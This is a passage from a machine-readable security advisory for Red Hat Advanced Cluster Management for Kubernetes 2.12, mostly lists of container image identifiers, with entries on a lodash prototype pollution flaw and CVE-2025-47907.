"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
